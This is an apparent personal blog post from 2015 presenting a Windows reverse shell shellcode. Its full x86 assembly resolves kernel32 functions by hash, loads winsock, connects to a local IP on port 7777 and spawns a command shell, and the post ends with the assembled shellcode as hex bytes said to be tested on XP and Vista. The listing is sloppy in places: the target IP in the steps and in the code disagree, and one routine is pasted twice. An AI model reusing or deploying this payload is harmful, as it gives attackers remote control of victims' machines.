Windows reverse shell universal shellcode

Written by  on August 29, 2015 

Here it goes:

1) resolve needed functions from kernel 32 and push them on the stack

2) load & initialize winsock library

3) create a socket and connect to 192.168.11.7 on port 7777

4) allocate space for needed structs

5) use createprocess to spawn a shell

6) profit

Of course this can be done better, it was just a game for me(gr8 for refreshing a few asm concepts)

; ly0n.me
mov eax, 646d6301h
sar eax, 08h
push eax ; cmd. to stack for later use
 
; Resolve Kernel32 Functions
; push array of hashes in stack
push 74776072h ; LoadLibraryA
push 48269992h ; GetModuleHandle
push 0E553E06Fh ; GetProcAddress
push 0F390B59Fh ; CreateProcessA
push 0C3F39F16h ; ExitProcess
call find_kernel32 ; Resolve kernel 32

mov ebp, eax ; store kernel base addr
xor ecx, ecx ; zero ecx for counter
mov esi, 14h ; array size
mov edx, esp ; save esp addr

; loop through all pieces of array
loadhash:
mov ebx, [esp + ecx]
add esp, 18h
add esp, ecx

add esp, 16h
push ebp ; save registers
push ecx
push esi
push edx

call find_function_kernel32

pop edx ; restore registers
pop esi
pop ecx
pop ebp
sub esp, 16h

mov [esp – 18h ], eax ; converts hash of function to function address

mov esp, edx ; restore esp
add cl, 4h
cmp ecx, esi
jne loadhash

; start working with winsock
push 00006C6Ch ; we push winsock lib name in stack
push 642E3233h
push 5F327377h
mov edi,esp
push edi
call eax ; winsock library loaded
mov esi, eax ; save winsock handle in esi
push 00007075h
push 74726174h
push 53415357h ; push WSASTART in stack
mov edi, esp
push edi ; parameter 1
push esi ; parameter 2

mov edx, [esp + 28h] ; call getprocaddress of wsastartup
mov ebx, edx
call edx ; make call efective

mov ecx, eax ; wsastartup addr -> ecx
mov eax, 0190h ; socket struct size
sub esp, eax ; adjusting the stack
push esp ; parameter 1
push eax ; parameter 2
call ecx ; we got windows socket ready to initialize

mov eax, ebx ; getprocaddress eax
push 00004174h ; WSASocket
push 656b636fh
push 53415357h
mov edi, esp
push edi ; parameter 1
push esi ; parameter 2
call eax ; WSASocket in EAX

xor edx, edx ; zero ecx
push edx ; push parameters of WSASocket to stack
push edx
push edx
push edx
inc edx
push edx
inc edx
push edx
call eax ; create a valid socket file descriptor -> eax

mov ebp, eax ; save file descriptor in eax
push 00746365h ; connect function
push 6e6e6f63h
mov edi, esp
push edi ; push parameters
push esi
call ebx ; call getprocaddress

push 040BA8C0h ; 192.168.11.4 in network byte order
mov edx, 611E0102h ; 7777 in network byte order
dec dh
push edx
mov ecx, esp
xor edx, edx
mov dl, 10h
push edx ; push parameters
push ecx
push ebp ; ebp contains socket file descriptor
call eax

nop
xor ecx, ecx ; allocate space in stack for startupInfo data structure
mov cl, 54h
sub esp, ecx
mov ebx, esp
push ebx
xor eax, eax
rep stosb ; create a proper buffer for data structures
pop edi
add edi, 5Ch ; adjust the stack
mov byte ptr[edi], 44h
inc byte ptr [edi + 2dh]
push edi
mov eax, ebp
lea edi, [edi + 38h]
stosd
stosd
stosd
pop edi
xor eax, eax
lea esi, [edi + 44h] ; size of struct
push esi ; push parameters
push edi
push eax
push eax
push eax
inc eax
push eax
dec eax
push eax
push eax
mov edi, esp
add edi, 24Ch ; cmd. in the stack
push edi
push eax
nop
mov eax, [esp + 244h] ; createprocess in the stack
call eax
mov eax, [esp + 218h] ; load exitprocess
call eax ; bye bye P-)

;find kernel 32
find_kernel32:
push esi ;save ESI reg
xor eax, eax ; 0 eax
mov eax, fs:[eax+30h] ; PEB
mov eax, [eax + 0ch] ; calculate addr
mov esi, [eax + 1ch] ;  
lodsd ; calculo
mov eax, [eax + 8h] ; eax = kernel32 base addr
pop esi ; restore ESI
ret ; ret with base addr

;find function in kernel 32 ; ebp =  kernel32 base ; ebx = function hash
find_function_kernel32:
xor ecx,ecx
mov edi,dword ptr ss:[ebp+3ch]
mov edi,dword ptr ss:[ebp+edi+78h]
add edi,ebp
next_function_pointer:
mov edx,dword ptr ds:[edi+20h]
add edx,ebp
mov esi,dword ptr ds:[edx+ecx*4]
add esi,ebp
xor eax,eax
cdq
hash_next_byte:
lods byte ptr ds:[esi]
ror edx,0dh
add edx,eax
test al,al
jnz short hash_next_byte
inc ecx
cmp edx,ebx
jnz short next_function_pointer
dec ecx
mov ebx,dword ptr ds:[edi+24h]
add ebx,ebp
mov cx,word ptr ds:[ebx+ecx*2h]
mov ebx,dword ptr ds:[edi+1ch]
add ebx,ebp
mov eax,dword ptr ds:[ebx+ecx*4h]
add eax,ebp
ret;find function in kernel 32 ; ebp =  kernel32 base ; ebx = function hash
find_function_kernel32:
xor ecx,ecx
mov edi,dword ptr ss:[ebp+3ch]
mov edi,dword ptr ss:[ebp+edi+78h]
add edi,ebp
next_function_pointer:
mov edx,dword ptr ds:[edi+20h]
add edx,ebp
mov esi,dword ptr ds:[edx+ecx*4]
add esi,ebp
xor eax,eax
cdq
hash_next_byte:
lods byte ptr ds:[esi]
ror edx,0dh
add edx,eax
test al,al
jnz short hash_next_byte
inc ecx
cmp edx,ebx
jnz short next_function_pointer
dec ecx
mov ebx,dword ptr ds:[edi+24h]
add ebx,ebp
mov cx,word ptr ds:[ebx+ecx*2h]
mov ebx,dword ptr ds:[edi+1ch]
add ebx,ebp
mov eax,dword ptr ds:[ebx+ecx*4h]
add eax,ebp
ret

 

shellcode (be aware of null bytes):

\xB8\x01\x63\x6D\x64\xC1\xF8\x08\x50\x68\x72\x60\x77\x74\x68\x92\x99\x26\x48\x68\x6F\xE0\x53\xE5\x68\x9F\xB5\x90\xF3\x68\x16\x9F
\xF3\xC3\xE8\x0C\x01\x00\x00\x8B\xE8\x33\xC9\xBE\x14\x00\x00\x00\x8B\xD4\x8B\x1C\x0C\x83\xC4\x18\x03\xE1\x83\xC4\x16\x55\x51\x56
\x52\xE8\x00\x01\x00\x00\x5A\x5E\x59\x5D\x83\xEC\x16\x89\x44\x24\xE8\x8B\xE2\x80\xC1\x04\x3B\xCE\x75\xD8\x68\x6C\x6C\x00\x00\x68
\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x8B\xFC\x57\xFF\xD0\x8B\xF0\x68\x75\x70\x00\x00\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8B
\xFC\x57\x56\x8B\x54\x24\x28\x8B\xDA\xFF\xD2\x8B\xC8\xB8\x90\x01\x00\x00\x2B\xE0\x54\x50\xFF\xD1\x8B\xC3\x68\x74\x41\x00\x00\x68
\x6F\x63\x6B\x65\x68\x57\x53\x41\x53\x8B\xFC\x57\x56\xFF\xD0\x33\xD2\x52\x52\x52\x52\x42\x52\x42\x52\xFF\xD0\x8B\xE8\x68\x65\x63
\x74\x00\x68\x63\x6F\x6E\x6E\x8B\xFC\x57\x56\xFF\xD3\x68\xC0\xA8\x0B\x04\xBA\x02\x01\x1E\x61\xFE\xCE\x52\x8B\xCC\x33\xD2\xB2\x10
\x52\x51\x55\xFF\xD0\x90\x33\xC9\xB1\x54\x2B\xE1\x8B\xDC\x53\x33\xC0\xF3\xAA\x5F\x83\xC7\x5C\xC6\x07\x44\xFE\x47\x2D\x57\x8B\xC5
\x8D\x7F\x38\xAB\xAB\xAB\x5F\x33\xC0\x8D\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\x8B\xFC\x81\xC7\x4C\x02\x00\x00\x57\x50
\x90\x8B\x84\x24\x44\x02\x00\x00\xFF\xD0\x8B\x84\x24\x18\x02\x00\x00\xFF\xD0\x56\x33\xC0\x64\x8B\x40\x30\x8B\x40\x0C\x8B\x70\x1C
\xAD\x8B\x40\x08\x5E\xC3\x33\xC9\x8B\x7D\x3C\x36\x8B\x7C\x2F\x78\x03\xFD\x8B\x57\x20\x03\xD5\x8B\x34\x8A\x03\xF5\x33\xC0\x99\xAC
\xC1\xCA\x0D\x03\xD0\x84\xC0\x75\xF6\x41\x3B\xD3\x75\xE4\x49\x8B\x5F\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5F\x1C\x03\xDD\x8B\x04\x8B
\x03\xC5\xC3

 

Tested on windows XP and windows VISTA

Category : 420blazeit

Leave a Reply

Your email address will not be published. Required fields are marked *